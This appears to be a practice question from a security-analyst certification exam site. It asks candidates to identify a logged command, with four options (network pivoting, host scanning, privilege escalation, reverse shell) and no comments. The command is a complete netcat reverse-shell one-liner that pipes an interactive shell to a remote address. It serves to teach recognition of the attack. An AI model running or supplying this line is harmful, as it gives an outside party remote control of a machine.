List of questions
Related questions
Question 202 - CS0-003 discussion
A security analyst detected the following suspicious activity:
rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f
Which of the following most likely describes the activity?
A.
Network pivoting
B.
Host scanning
C.
Privilege escalation
D.
Reverse shell
Your answer:
0 comments
Sorted by
Leave a comment first